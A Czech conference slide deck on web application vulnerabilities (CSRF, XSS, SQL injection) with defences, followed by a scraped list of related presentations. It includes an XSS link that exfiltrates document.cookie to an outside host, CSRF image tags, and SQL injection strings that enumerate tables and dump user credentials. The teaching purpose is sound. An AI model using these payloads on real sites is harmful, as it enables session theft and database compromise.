Zranitelnosti webových aplikací. Vlastimil Pečínka, Seznam.cz Roman Kümmel, Soom.cz
|
|
- Blanka Dušková
- před 9 lety
- Počet zobrazení:
Transkript
1 Zranitelnosti webových aplikací Vlastimil Pečínka, Seznam.cz Roman Kümmel, Soom.cz
2 Terminologie Zranitelnost (vulnerability) Slabina, která umožní utočníkovi snížit/obejít ochranu dat a informací Security bug je užší vnímání zranitelnosti; existují non-sw zranitelnosti (HW, zaměstnanci, ) Exploit V informatice program nebo sekvence příkazů, které využívají zranitelnosti a umožňují tak získat nějaký prospěch
3 Webové zranitelnosti XSS Cross-site scripting Využití důvěry uživatele v server CSRF Cross-site request forgery Využití důvěry serveru v software uživatele
4 Webové zranitelnosti HTTP header injection Využití vlastností HTTP protokolu v kombinaci s neošetřeným předávaným vstupem od uživatele v hlavičkách SQL injection Využití mezery v zabezpečení na úrovni databázové vrstvy aplikace
5 Svět webových zranitelností Proměnná CSS Flash CRLF RFI LFI SQLi FPD SQL injection CSRF XSS HTTP injection Same origin policy IE XSS filter NOSCRIPT Persistent Non- Persistent DOM based HTTP only cookies Content security policy
6 Praktická ukázka Roman Kümmel
7 Praktická ukázka Zranitelná webová aplikace
8 Cross Site Request Forgery (CSRF) Každá změna v datech uložených na serveru je jen reakcí na požadavek vyslaný browserem Každý uživatel je na serveru identifikován Každý uživatel může provádět změny pouze ve svém vlastním účtu
9 Cross Site Request Forgery (CSRF) Nikdo střízlivý nedá vědomě serveru povel na přesměrování pošty na účet útočníka Cílem útočníka je přimět uživatele k jeho odeslání
10 Útok (CSRF) Nazdar Pepo, nechceš zítra zajít na pivo? Lojza <img src= >
11 Útok (CSRF) X
12 Obrana (CSRF) Každá změna v datech uložených na serveru je jen reakcí na požadavek vyslaný browserem Každý uživatel je na serveru identifikován Každý uživatel může provádět změny pouze ve svém vlastním účtu hash=a5dd78e r .php?mail=user@seznam.cz&hash=a5dd78e
13 CSRF : XSS Zjištění hodnoty lístku pomocí XSS
14 Cross Site Scripting (XSS) Skripty mohou přistupovat pouze k objektům ze stejné domény ( Same Origin Policy ) Pokud existuje chyba v zabezpečení, je možné injektovat skript do html dokumentu z dané domény Perzistentní (trvalé) Non-perzistentní (reflektované)
15 Non-perzistetní XSS Odeslání požadavku webovým vyhledávačem Odpověď vrácená prohlížečem Na váš dotaz slunce nebyl nalezen žádný výsledek
16 Non-perzistetní XSS Odeslání požadavku webovým vyhledávačem Zobrazení odpovědi vede ke spuštění skriptu Na váš dotaz <script>alert(1)</script> nebyl nazezen žádný výsledek
17 Možné cíle útoku (XSS) Krádež cookies Přesměrování uživatelů na jiné webové stránky Defacement webové stránky Automatické odesílání CSRF požadavků Změna atributu action u přihlašovacích formulářů Odposlouchávání stisknutých kláves Průzkum vnitřní sítě Backdoor s obousměrnou komunikací Mnoho dalších variant útoku
18 Cookie stealing (XSS) Nazdar Pepo, nechceš zítra zajít na pivo? Lojza <a href= document.createelement%28%22img%22%29%3b+i.src%3d%22 http%3a%2f%2fmyserver.cz%3fsavecook%3d%22%252b document.cookie%3b%3c%2fscript%3e >Super odkaz</a> <script> i=document.createelement("img"); i.src= </script>
19 Cookie stealing (XSS)
20 Obrana (XSS) Nahrazení nebezpečných znaků HTML entitami < ≶ > > " ' & & Nebezpečnost znaků záleží na kontextu v jakém jsou použity - <p>toto je tvůj vstup: <script>alert(1)</script></p> - <input type= text value= onfocus= alert(1) > Pozor na Javascript: a Data: URL v odkazech - <a href= javascript:alert(1) >odkaz</a>
21 Obrana (XSS) Uživatelský vstup kontrolovat podle bílých seznamů Co není povoleno, je zakázáno!
22 SQL injection Zmanipulování dotazu do databáze SELECT jablka FROM strom SELECT hrušky FROM obchod
23 SQL injection pepa pass123 PHP $sql = "SELECT * FROM users WHERE (login = '$login') and (heslo = '$heslo')"; $res = mysql_query($sql); SQL SELECT * FROM users WHERE (login = 'pepa') and (heslo = 'pass123')
24 Útok SQL injection ' OR '1' = '1 pepa PHP $sql = "SELECT * FROM users WHERE (login = '$login') and (heslo = '$heslo')"; $res = mysql_query($sql); SQL SELECT * FROM users WHERE (login = 'pepa') and (heslo = '' OR '1' = '1')
25 SQL injection PHP $sql = "SELECT * FROM messages WHERE idprijemce = $iduser"; $res = mysql_query($sql); SQL SELECT * FROM messages WHERE idprijemce = 11614
26 Útok SQL injection PHP $sql = "SELECT * FROM messages WHERE idprijemce = $iduser"; $res = mysql_query($sql); SQL SELECT * FROM messages WHERE idprijemce = -1 or 1=1
27 Útok SQL injection Zjištění počtu sloupců tabulky v původním dotazu Zjištění zobrazených polí iduser=-1 union all select 1,2,3,4 Zjištění názvu databáze iduser=-1 union all select 1,2,3,database() SELECT * FROM messages WHERE idprijemce = -1 order by 1 -- Zjištění názvů tabulek a sloupců iduser=-1 union all select 1,2,table_name,column_name from information_schema.columns where table_schema=database() Výpis obsahu tabulky USERS iduser=-1 union all select 1,nick,login,heslo from users--
28 Obrana proti SQL injection Kontrola vstupu Odstranění, zdvojení nebo escapování apostrofů Číselné hodnoty ošetřit typovou konverzí Výčtové vstupy kontrolovat na očekávané hodnoty Využití parametrizovaných SQL dotazů Využití uložených procedur
29 Injektáž skriptu na server Nezabezpečený upload Local File Inclusion (LFI) Remote File Inclusion (RFI)
30 (ne) bezpečný Internet
31 Pomocníci v zabezpečení Content Security Policy Same origin policy XSS filter v IE HTTPonly cookies
32 Content security policy Pravidla zaměřená na potlačení především XSS CSP umožňuje poskytovatelům definovat pravidla, kterými se prohlížeč řídí Pravidla se pro dokument v HTTP hlavičkách Možnost reportingu při porušení pravidel Browser bonzuje pomocí JSON, co se stalo Report-only mode (what-if scénáře) X-Content-Security-Policy: allow 'self'; img-src *; \ object-src media1.com media2.com *.cdn.com; \ script-src trustedscripts.example.com
33 Same origin policy Koncept známý od doby Netscape Navigator 2.0 Pravidla povolují plný přístupu skriptů k funkcím a proměnným ve stránkách ze stejných zdrojů (a naopak limitují přístup k datům jiných zdrojů) Jiný hostname (i vs seznam.cz) Jiný port ( vs Jiný protokol ( vs Nejasně definované pro file:, data:, Jiné policy např. pro skripty z jiných domén
34 IE XSS filter Vlastnost IE8, která ztěžuje tzv. reflected XSS Filtr je komponenta, která je zapojena do všech požadavků, které tečou skrze prohlížeč Snaží se detekovat XSS a případně neutralizovat
35 HTTPonly cookie Stále ve stádiu draftu IETF, nicméně široce podporované v prohlížečích Cookie, které není přístupná skriptům na stránce, jen použita pro HTTP/HTTPS session Často použita v kombinaci s omezením přenášení po zabezpečeném spojení Set-Cookie: SSID=Adsd4ddssTq; Domain=.seznam.cz; Path=/; Expires=Wed, 13-Jan :23:01 GMT; Secure; HttpOnly
36 Děkujeme za pozornost Vlastimil Pečínka Roman Kümmel
Testování webových aplikací Seznam.cz
Testování webových aplikací Seznam.cz Roman Kümmel Bezpečnostní hrozby Síťové prvky, servery VPN, Remote desktop Webové aplikace DoS, DDoS Sociotechnika Wi-Fi Útoky proti uživatelům Útoky proti aplikaci
VíceHitparáda webhackingu nestárnoucí hity. Roman Kümmel
Hitparáda webhackingu nestárnoucí hity Roman Kümmel Bezpečnostní hrozby Síťové prvky, servery VPN, Remote desktop Webové aplikace DoS, DDoS Sociotechnika Wi-Fi Útoky proti uživatelům Útoky proti aplikaci
VíceContent Security Policy
Content Security Policy Nový přístup v boji proti XSS 2011.cCuMiNn. Cross Site Scripting (XSS) XSS je všudypřítomné výskyt cca v 80% webových aplikací Webový browser nevidí rozdíl mezi legitimním skriptem
VíceCross-Site Scripting (XSS)
Cross-Site Scripting (XSS) Bc. Aleš Joska Vysoká škola báňská Technická univerzita Ostrava Fakulta elektrotechniky a informatiky 3. duben 2018 Aleš Joska Cross-Site Scripting (XSS) 3. duben 2018 1 / 16
VíceSQL injection jak ji možná neznáte Roman Kümmel
SQL injection jak ji možná neznáte Roman Kümmel r.kummel@hacker-consulting.cz Výskyt První zmínky o SQL injekci pochází z roku 1998 Ani po ti letech není situace uspokojivá Zranitelností SQL injection
VíceInformační systémy 2008/2009. Radim Farana. Obsah. Aktivní serverové stránky ASP. Active Server Pages. Activex Data Objects. LDAP database.
11 Vysoká škola báňská Technická univerzita Ostrava Fakulta strojní, Katedra automatizační techniky a řízení 2008/2009 Radim Farana 1 Obsah Tvorba webových aplikací. Active Server Pages. Activex Data Objects.
VíceZabezpečení web aplikací
Zabezpečení web aplikací Radomír Orkáč, Martin Černáč 2018-04-26, Praha, Seminar Proaktini bezpecnost 1 Rozdělení chyb Každý program je buď triviální, nebo obsahuje alespoň jednu chybu. Oblasti dle výskytu
VíceObsah přednášky. Představení webu ASP.NET frameworky Relační databáze Objektově-relační mapování Entity framework
Web Jaroslav Nečas Obsah přednášky Představení webu ASP.NET frameworky Relační databáze Objektově-relační mapování Entity framework Co to je web HTTP protokol bezstavový GET POST HEAD Cookies Session HTTPS
VíceCross- Site Request Forgery
Prez en tace k p řed n ášce o CSRF ú tocích Přip raven o p ro SOOM session #4 2007 Jiné ozna ení této zranitelnosti č Cross- Site Request Forgery CSRF Cross- Site Reference Forgery XSRF Historie CSRF (první
VíceDell SonicWALL. Security tips & tricks. Jan Ježek business communication s.r.o.
Dell SonicWALL Security tips & tricks Jan Ježek business communication s.r.o. Příklady bezpečnostních rizik Pasivní útoky iniciované zvenku Virus attacks, Malware & Spyware SPAM, Phishing Exploit (OS,
VíceIng. Přemysl Brada, MSc., Ph.D. Ing. Martin Dostal. Katedra informatiky a výpočetní techniky, FAV, ZČU v Plzni
Webové aplikace Ing. Přemysl Brada, MSc., Ph.D. Ing. Martin Dostal Katedra informatiky a výpočetní techniky, FAV, ZČU v Plzni Harmonogram Dopolední blok 9:00 12:30 Ing. Dostal Úvod, XHTML + CSS Ing. Brada,
VíceMaturitní témata z předmětu PROGRAMOVÉ VYBAVENÍ pro šk. rok 2012/2013
Maturitní témata z předmětu PROGRAMOVÉ VYBAVENÍ pro šk. rok 2012/2013 1. Nástroje programu MS Word a) vysvětlete pojmy šablona, styl (druhy stylů) význam a užití, b) vysvětlete pojem oddíl (druhy oddílů),
Více2.přednáška. Informační bezpečnost: Systém řízení informační bezpečnosti (ISMS)
Systém řízení informační bezpečností: Úvod RNDr. Igor Čermák, CSc. Katedra počítačových systémů Fakulta informačních technologií České vysoké učení technické v Praze Igor Čermák, 2011 Informační bezpečnost,
VíceVývoj Internetových Aplikací
10 Vývoj Internetových Aplikací Bezpečnost Ing. Michal Radecký, Ph.D. www.cs.vsb.cz/radecky https://www.ted.com/talks/mikko_hypponen_fighting_ viruses_defending_the_net Co je to Cyber kriminalita http://www.internetprovsechny.cz/pocitacova-kriminalita-a-bezpecnost/
VíceNejčastější zranitelnosti webových aplikací. Pavel Bašta pavel.basta@nic.cz 30.11.2013
Nejčastější zranitelnosti webových aplikací Pavel Bašta pavel.basta@nic.cz 30.11.2013 CSIRT.CZ CSIRT, národní CSIRT, vládní CSIRT CSIRT.CZ - Národní CSIRT České republiky Založen v rámci plnění grantu
VíceKoláčky, sezení. Martin Klíma
Koláčky, sezení Martin Klíma UDRŽOVÁNÍ STAVU APLIKACE Udržování stavu aplikace 1. Pomocí skrytých polí (viz příklad wizard) 2. Pomocí obohacování odkazů 3. Pomocí cookies 4. Pomocí sessions Obohacování
VíceFormuláře. Internetové publikování
Formuláře Internetové publikování Formuláře - příklad Formuláře - použití Odeslání dat od uživatele Možnosti zpracování dat Webová aplikace na serveru (ASP, PHP) Odeslání e-mailem Lokální script Formuláře
VíceBezpečnost a bezpečné programování
Bezpečnost a bezpečné programování 10. Bezpečnost webových aplikací Ing. Tomáš Zahradnický, EUR ING, Ph.D. České vysoké učení technické v Praze Fakulta informačních technologií Katedra počítačových systémů
VíceTřídy a objekty. Třídy a objekty. Vytvoření instance třídy. Přístup k atributům a metodám objektu. $z = new Zlomek(3, 5);
Programovací jazyk PHP doc. Ing. Miroslav Beneš, Ph.D. katedra informatiky FEI VŠB-TUO A-1007 / 597 324 213 http://www.cs.vsb.cz/benes Miroslav.Benes@vsb.cz Obsah Třídy a objekty Výjimky Webové aplikace
VíceUniverzita Pardubice Fakulta elektrotechniky a informatiky. WWW aplikace s využitím relační databáze pro správu sportovního centra Michal Nosil
Univerzita Pardubice Fakulta elektrotechniky a informatiky WWW aplikace s využitím relační databáze pro správu sportovního centra Michal Nosil Bakalářská práce 2009 Prohlašuji: Tuto práci jsem vypracoval
VíceEfektivní řízení rizik
Efektivní řízení rizik Dell Jan Ježek business communication s.r.o. Trendy Co si žádá byznys? Nárůst dat, aplikací a komunikačních toků Přesun byznys aplikací na web BYOD koncept Zabezpečení dat & vysoká
VíceVÝVOJ INTERNETOVÝCH APLIKACÍ - VIA
Metodický list č. 1 Způsob zakončení : Úvod Technologie webových aplikací Protokol HTTP Po zvládnutí tématického celku bude student mít základní přehled o problematice programování internetových (webových)
VícePavel Kaňkovský, DCIT Consulting. kan@dcit.cz SOFTECON 2006 2. 3. 2006
Bezpečnostní slabiny webových aplikací Pavel Kaňkovský, DCIT Consulting kan@dcit.cz SOFTECON 2006 2. 3. 2006 Obsah Úvod co jsou webové aplikace a čím jsou specifické Autentizace a správa uživatelských
Více12. Základy HTML a formuláře v HTML
12. Základy HTML a formuláře v HTML 1) Co je to HTML a historie HTML 2) Termíny v HTML a. tag b. značka c. element d. atribut e. entita 3) specifikace a. html, xhtmll b. rozdíly xhtml a html 4) struktura
VícePočítačové sítě II. 18. World Wide Web, HTTP Miroslav Spousta, 2006 <qiq@ucw.cz>, http://www.ucw.cz/~qiq/vsfs/
Počítačové sítě II 18. World Wide Web, HTTP Miroslav Spousta, 2006 , http://www.ucw.cz/~qiq/vsfs/ 1 Historie WWW World Wide Web v současnosti nejrozšířenější a nejpoužívanější služba Internetu
VíceBezpečnost webových aplikací
Bezpečnost webových aplikací Začátek Bezpečnost webových aplikací Luboš Matějka Bezpečnost čeho? Zneužití Data na serveru Data uživatelů na PC Odesílaná data Odmítnutí Kompromitace serveru Odmítnutí služeb
Více24.5.2008 Jaku b Su ch ý 1
Drupal API 24.5.2008 Jaku b Su ch ý 1 Témata Práce s databází Bezpečnost práce s Drupalem Forms API Jak udělat vlastní modul Hooks Lokalizace 24.5.2008 Jaku b Su ch ý 2 Práce s databází Drupal poskytuje
VíceHTTP hlavičky pro bezpečnější web
HTTP hlavičky pro bezpečnější web Petr Krčmář 13. dubna 2019 Uvedené dílo (s výjimkou obrázků) podléhá licenci Creative Commons Uveďte autora 3.0 Česko. Petr Krčmář (Root.cz, vpsfree.cz) HTTP hlavičky
VíceOBSAH. Předmluva 13 Poděkování 14. 1. Přehled dnešního vývoje webů 15. 2. Design pro minulost, přítomnost i budoucnost 33
OBSAH Předmluva 13 Poděkování 14 1. Přehled dnešního vývoje webů 15 Definice webdesignu 16 Sedm pravidel webdesignu 19 Tři filozofie webdesignu 20 Filozofie použitelnosti 21 Filozofie multimédií 25 Filozofie
VíceMalý průvodce Internetem
Malý průvodce Internetem Úvod Toto povídání by mělo sloužit jako užitečný zdroj informací pro ty, co o Internetu zatím mnoho neví nebo o něm jen slyšeli a neví, co si pod tím slovem představit. Klade si
VíceEfektivní řízení rizik webových a portálových aplikací
Efektivní řízení rizik webových a portálových aplikací CLEVERLANCE Enterprise Solutions a.s. Ing. Jan Guzanič, CISA, Senior IT Security Consultant Mob.: +420 602 566 693 Email: jan.guzanic@cleverlance.com
VíceINFORMAČNÍ SYSTÉMY NA WEBU
INFORMAČNÍ SYSTÉMY NA WEBU Webový informační systém je systém navržený pro provoz v podmínkách Internetu/intranetu, tzn. přístup na takový systém je realizován přes internetový prohlížeč. Použití internetového
VíceINTERNET. Vypracoval: Mgr. Marek Nývlt
INTERNET Vypracoval: Mgr. Marek Nývlt Obsah prezentace 1. Internet 2. Historie Internetu 3. Připojení k Internetu 4. Adresy na Internetu 5. Internetové služby 6. Informace na Internetu 7. Budoucnost Internetu
VíceVývoj internetových aplikací. 9. Útoky na internetové aplikace. a možná obrana proti nim
Vývoj internetových aplikací 9. Útoky na internetové aplikace a možná obrana proti nim Tomáš Tureček, Jiří Suchora, VŠB-TU Ostrava, FEI, 456, 2009 Obsah přednášky Úvod PHP injekce SQL injekce XSS útoky
VíceBezpečnost webových aplikací v ASP.NET
Jakub Čermák Software fox, HAVIT, s.r.o. cermak@havit.cz, jakub@jcermak.cz Twitter@cermakj Bezpečnost webových aplikací v ASP.NET Agenda Obecné zásady, kryptografická primitiva Běžné útoky a chyby A8 CSRF
VíceZabezpečení platformy SOA. Michal Opatřil Corinex Group
Zabezpečení platformy Michal Opatřil Corinex Group Agenda Současný přístup k bezpečnosti Požadavky zákazníků CA Security Manager Architektura Klíčové vlastnosti Proč CA Security Manager CA 2 Security Manager
VíceIdentifikátor materiálu: ICT-3-55
Identifikátor materiálu: ICT-3-55 Předmět Téma sady Téma materiálu Informační a komunikační technologie Počítačové sítě, Internet Funkce a přehled internetových prohlížečů Autor Ing. Bohuslav Nepovím Anotace
VíceÚvod do aplikací internetu a přehled možností při tvorbě webu
CVT6 01a Úvod do aplikací internetu a přehled možností při tvorbě webu Internet a www Internet? Služby www ftp e-mail telnet NetNews konference IM komunikace Chaty Remote Access P2P aplikace Online games
Více5/3.3 BEZPEČNOSTNÍ ASPEKTY JAZYKA PHP
BEZPEČNÁ POČÍTAČOVÁ SÍŤ část 5, díl 3, kap. 3, str. 1 5/3.3 BEZPEČNOSTNÍ ASPEKTY JAZYKA PHP Register_globals Hlavním bezpečnostním rizikem především začínajícího programátora je opomenutí resetování proměnné,
VíceŠifrování Autentizace Bezpečnostní slabiny. Bezpečnost. Lenka Kosková Třísková, NTI TUL. 22. března 2013
Šifrování Autentizace ní slabiny 22. března 2013 Šifrování Autentizace ní slabiny Technologie Symetrické vs. asymetrické šifry (dnes kombinace) HTTPS Funguje nad HTTP Šifrování s pomocí SSL nebo TLS Šifrování
VíceČást 1 Moderní JavaScript
Obsah Část 1 Moderní JavaScript Kapitola 1 Moderní programování v JavaScriptuh.................... 13 Objektově orientovaný JavaScript................................13 Testování zdrojového kódu......................................
VíceHTTP protokol. HTTP protokol - úvod. Zpracoval : Petr Novotný novotny0@students.zcu.cz
HTTP protokol Zpracoval : Petr Novotný novotny0@students.zcu.cz HTTP protokol - úvod zkratka z Hyper-Text Transfer Protocol možnost přenášet jakákoliv data (soubor, obrázek, výsledek dotazu) obvykle provozován
VíceUniverzita Pardubice. Centrální správa dokumentů
Univerzita Pardubice Fakulta ekonomicko-správní Centrální správa dokumentů Martina Bendová Bakalářská práce 2010 Prohlášení autora Prohlašuji: Tuto práci jsem vypracovala samostatně. Veškeré literární
VíceŘešení ochrany databázových dat
Řešení ochrany databázových dat Projekt Raiffeisenbank CZ Aleš Tumpach CISA April 25, 2016 Pokud dojde k bezpečnostnímu incidentu, informace v databázi jsou nejčastějším cílem útoku WHY? % of Records Breached
VíceVývojařská Plzeň AngularJS
Vývojařská Plzeň AngularJS Milan Lempera @milanlempera Víťa Plšek @winsik PHP -> Javascript PHP -> Java -> Javascript www.angular.cz ? Psal se rok 2009 ano 2009... Jak se tehdy tvořili webové aplikace?
VíceWebové služby a XML. Obsah přednášky. Co jsou to webové služby. Co jsou to webové služby. Webové služby a XML
Obsah přednášky Webové služby a XML Miroslav Beneš Co jsou to webové služby Architektura webových služeb SOAP SOAP a Java SOAP a PHP SOAP a C# Webové služby a XML 2 Co jsou to webové služby rozhraní k
VíceZásady pro udělování a užívání značky Kraj Vysočina DOPORUČUJE PRO BEZPEČNÝ INTERNET verze červen 2012
1. Cíl značky Zásady pro udělování a užívání značky Kraj Vysočina DOPORUČUJE PRO BEZPEČNÝ INTERNET verze červen 2012 Značka Kraj Vysočina DOPORUČUJE PRO BEZPEČNÝ INTERNET byla vytvořena v souvislosti s
VíceMinebot manuál (v 1.2)
Minebot manuál (v 1.2) Pro Váš rychlý start s nástrojem Minebot jsme připravili tohoto stručného průvodce, který by Vám měl být pomocníkem při spuštění a používání služby. Tento stručný průvodce by vám
VíceÚvod do tvorby internetových aplikací
CVT6 01a Úvod do tvorby internetových aplikací Osnova předmětu (X)HTML a tvorba webu pomocí přímého zápisu kódu Tvorba web designu a skládání stránek z kousků Skriptovací jazyky na webu Návrh software
VíceTvorba WWW stránek. přehled technologií používaných na webu principy jednotlivých technologií a možnosti jejich vzájemného kombinování
Tvorba WWW stránek přehled technologií používaných na webu principy jednotlivých technologií a možnosti jejich vzájemného kombinování HTML/XHTML kaskádové styly PHP spolupráce PHP s databázemi Technologie
VíceNázev: VY_32_INOVACE_PG4102 Základní HTML značky. Autor: Mgr. Tomáš Javorský. Datum vytvoření: 05 / 2012. Ročník: 3
Název: VY_32_INOVACE_PG4102 Základní HTML značky Autor: Mgr. Tomáš Javorský Datum vytvoření: 05 / 2012 Ročník: 3 Vzdělávací oblast / téma: webdesign, počítačová grafika Anotace: Seznámení s nejdůležitějšími
VíceIntegrovaný agent obchodníka elektronického obchodu (IMA) Příručka správce
Integrovaný agent obchodníka elektronického obchodu (IMA) Verze 2.10.0 1 2. Příprava na provoz IMA 2.1. Systémové požadavky 2.1.1. Požadovaný software třetí strany Komponenta Verze Poznámky Sun Java Runtime
VíceDemilitarizovaná zóna (DMZ)
Demilitarizovaná zóna (DMZ) Bezpečnostní seminář ČP AFCEA Aktuální trendy v zabezpečení DMZ Dalibor Sommer/ březen 2013 Agenda HP Enterprise Security Strategy Aktuální bezpečnostní hrozby SDN a jeho využití
VíceStřední odborná škola a Střední odborné učiliště, Hořovice
Kód DUM : VY_32_INOVACE_DYN.1.8 Název materiálu: 8 PHP- práce s HTML formulářem v PHP Anotace Autor Jazyk Očekávaný výstup DUM naučí žáky používat v PHP soubory pro uložení a přečtení dat Ing. Vladimír
VíceÚROVEŇ BEZPEČNOSTI INTERNETOVÝCH APLIKACÍ V ČESKÉ REPUBLICE SECURITY OF INTERNET APPLICATIONS IN THE CZECH REPUBLIC. Petr Zelenka
ÚROVEŇ BEZPEČNOSTI INTERNETOVÝCH APLIKACÍ V ČESKÉ REPUBLICE SECURITY OF INTERNET APPLICATIONS IN THE CZECH REPUBLIC Petr Zelenka Anotace: Článek se věnuje problematice bezpečnosti internetových aplikací.
VíceIndividuální projekt z předmětu webových stránek 2012 - Anketa Jan Livora
UŽIVATELSKÁ TECHNICKÁ DOKUMENTACE ANKETA : Individuální projekt z předmětu webových stránek 2012 - Anketa Jan Livora [2ITa] [sk1] 1 Obsah DŮLEŽITÉ UPOZORNĚNÍ!!!... 3 PROHLÁŠENÍ O AUTORSTVÍ:... 3 ANOTACE:...
VíceUNIVERZITA PARDUBICE. Fakulta elektrotechniky a informatiky. Informační systém realitní kanceláře Jan Šimůnek
UNIVERZITA PARDUBICE Fakulta elektrotechniky a informatiky Informační systém realitní kanceláře Jan Šimůnek Bakalářská práce 2011 Prohlášení autora Prohlašuji, že jsem tuto práci vypracoval samostatně.
VíceSUM U3 SUM U4 SUM U5 SUM
Číslo soutěžícího 1,1 1,2 1,3 1,4 1,5 SUM U1 2,1 2,2 2,3 2,4 2,5 2, 2,7 2,8 SUM U2 3,1 3,2 3,3 3,4 3,5 3, 3,7 3,8 3,9 3.10 3.11 3.12 3.13 3.14 SUM U3 SUM U4 SUM U5 SUM 7 8 1 1 2 18 8 3 1 0 1 3 2 24 8 2
VíceX36 WWW Šablony Martin Klíma xklima@fel.cvut.cz Čtryřvrstvá architektura Server Klient Prezentační logika Aplikační Logika Databáze 2 Výhody Jednotlivé vrstvy jsou nezávislé Lze je samostatně spravovat
VícePROJEKT ININ, 1 ČÁST 1 ORACLE APEX. Martin Šimeček (kruh 258), prosinec 08
PROJEKT ININ, 1 ČÁST 1 ORACLE APEX Martin Šimeček (kruh 258), prosinec 08 Členění Oracle APEX ČLENĚNÍ Práce je rozdělena na tři části: První, nazvaná Portál Oracle APEX, se týká samotného Application Expressu.
VíceTvorba jednoduchých WWW stránek. VŠB - Technická univerzita Ostrava Katedra informatiky
Tvorba jednoduchých WWW stránek RNDr. Daniela Ďuráková VŠB - Technická univerzita Ostrava Katedra informatiky Vznik WWW technologie Vznik - CERN 1989-90, vedoucí projektu Tim Berners-Lee cíl - infrastruktura
VíceDJ2 rekurze v SQL. slajdy k přednášce NDBI001. Jaroslav Pokorný
DJ2 rekurze v SQL slajdy k přednášce NDBI001 Jaroslav Pokorný 1 Obsah 1. Úvod 2. Tvorba rekurzívních dotazů 3. Počítaní v rekurzi 4. Rekurzívní vyhledávání 5. Logické hierarchie 6. Zastavení rekurze 7.
VíceInformační systémy ve zdravotnictví. 8. cvičení
Vysoká škola báňská Technická univerzita Ostrava Fakulta elektrotechniky a informatiky Informační systémy ve zdravotnictví 8. cvičení Ing. Petr Lukáš petr.lukas@nativa.cz Ostrava, 2014 Opakování Klauzule
VíceWeb Application Security aneb další. rozměr hackingu. XanthiX Soom session IV
Web Application Security aneb další rozměr hackingu XanthiX Struktura Uvedení do problematiky Vlastní výzkum v oblasti WAS Praktické ukázky Síla XSS aneb may the force be with you! Prohlížeč nebo systém
Více1. Úvod do webových aplikací
1. Úvod do webových aplikací Současný web je postaven na třech standardech. Prvním je systém Internetových adres nazvaný URL, druhým je síťový protokol HTTP určený pro přenos dat mezi klientem a serverem,
Vícerychlý vývoj webových aplikací nezávislých na platformě Jiří Kosek
rychlý vývoj webových aplikací nezávislých na platformě Jiří Kosek Co je to webová aplikace? příklady virtuální obchodní dům intranetový IS podniku vyhledávací služby aplikace jako každá jiná přístupná
VíceKurz je rozdělen do čtyř bloků, které je možné absolvovat i samostatně. Podmínkou pro vstup do kurzu je znalost problematiky kurzů předešlých.
Soubor kurzů XHTML, CSS, PHP a MySQL Kurz je rozdělen do čtyř bloků, které je možné absolvovat i samostatně. Podmínkou pro vstup do kurzu je znalost problematiky kurzů předešlých. Jeden blok se skládá
VíceC6 Bezpečnost dat v Internetu. 2. HTTP komunikace 3. HTTPS komunikace 4. Statistiky
C6 T1 Vybrané kapitoly počíta tačových s sítí Bezpečnost dat v Internetu 1. Počíta tačová bezpečnost 2. HTTP komunikace 3. 4. Statistiky 2 Cíle cvičen ení C6 Bezpečnost dat v Internetu 1. Charakterizovat
VíceSAML a XACML jako nová cesta pro Identity management. SAML and XACML as a New Way of Identity Management
SAML a XACML jako nová cesta pro Identity management SAML and XACML as a New Way of Identity Management Dagmar BRECHLEROVÁ Oddělení medicínské informatiky, Ústav informatiky AVČR, v.v.i. brechlerova@euromise.cz
VíceKIV/PIA 2013 Jan Tichava
KIV/PIA 2013 Jan Tichava Java EE JSF, PrimeFaces Spring JPA, EclipseLink Java Platform, Enterprise Edition Persistence Zobrazovací vrstva Interakce aplikací Deployment Java Persistence API Enterprise
VíceZápadočeská univerzita v Plzni Fakulta aplikovaných věd Katedra informatiky a výpočetní techniky. v EEG/ERP portálu
Západočeská univerzita v Plzni Fakulta aplikovaných věd Katedra informatiky a výpočetní techniky Diplomová práce Systém oprávnění v EEG/ERP portálu Plzeň, 2011 Jiří Vlašimský Prohlášení Prohlašuji, že
VíceTlačítkem Poskládej jiný počítač se hra vrátí na úvodní obrazovku a lze zvolit jiný obrázek.
PUZZLE POČÍTAČE Hra Puzzle počítače je psána pomocí příkazů Javascriptu, skriptovacího jazyka PHP a standardních příkazů HTML. Před vlastním spuštěním hry je možné seznámit se s nejznámějšími komponenty
Více(X)HTML. Internetové publikování
(X)HTML Internetové publikování 1 Prohlížeč Obsluhuje přenos a interpretuje obsah Hlavní prohlížeče Microsoft Internet Explorer Firefox Opera Safari WWW stránka WWW stránka dokument (soubor) s informacemi
VíceÚvod do databázových systémů
Vysoká škola báňská Technická univerzita Ostrava Fakulta elektrotechniky a informatiky Úvod do databázových systémů Cvičení 3 Ing. Petr Lukáš petr.lukas@vsb.cz Ostrava, 2014 Opakování 4 fáze vytváření
VíceSnadný vývoj webových aplikací s Nette. Lukáš Jelínek
Snadný vývoj webových aplikací s Nette Lukáš Jelínek Proč framework? ušetří spoustu práce (implementace, úpravy) vývoj = co udělat, ne jak to udělat bezpečnost štábní kultura prostředky pro ladění podpora
VíceInternet cvičení. ZS 2009/10, Cvičení 4.,15.12.2009 PHP. Tomáš Pop. DISTRIBUTED SYSTEMS RESEARCH GROUP http://dsrg.mff.cuni.cz
Internet cvičení ZS 2009/10, Cvičení 4.,15.12.2009 PHP Tomáš Pop DISTRIBUTED SYSTEMS RESEARCH GROUP http://dsrg.mff.cuni.cz CHARLES UNIVERSITY PRAGUE Faculty of Mathematics and Physics Generování tabulky
VíceFormuláře. Aby nám mohli uživatelé něco hezného napsat...... třeba co si o nás myslí!
Formuláře Aby nám mohli uživatelé něco hezného napsat...... třeba co si o nás myslí! HTML formuláře: Formuláře Možnost, jak uživatel může vložit obsah na web - odeslat data na server - zpracovat data ve
VíceRodina protokolů TCP/IP, verze 2.3. Část 10: World Wide Web
v. 2.3 Katedra softwarového inženýrství, Matematicko-fyzikální fakulta, Univerzita Karlova, Praha Rodina protokolů, verze 2.3 Část 10: World Wide Web Jiří Peterka, 2006 v. 2.3 Prehistorie WWW dr. Vannevar
VíceGrafické rozhraní pro práci s formuláři přes internet Graphic interface for working with forms placed on Internet. Bc.
Grafické rozhraní pro práci s formuláři přes internet Graphic interface for working with forms placed on Internet Bc. Marek Kojecký Diplomová práce 2007 ABSTRAKT Práce pojednává o webových aplikacích
VíceInternet WEB stránky HTML, Hypertext MarkUp Language - nadtextový jazyk - Místo příkazů obsahuje tagy - značky
Internet WEB stránky HTML, Hypertext MarkUp Language - nadtextový jazyk - Místo příkazů obsahuje tagy - značky Fungování internetu je celosvětový systém navzájem propojených počítačových sítí ve kterých
VíceZabezpečení webové vrstvy a EJB projektu Část nastavení specifická pro Glassfish, část dána Java EE
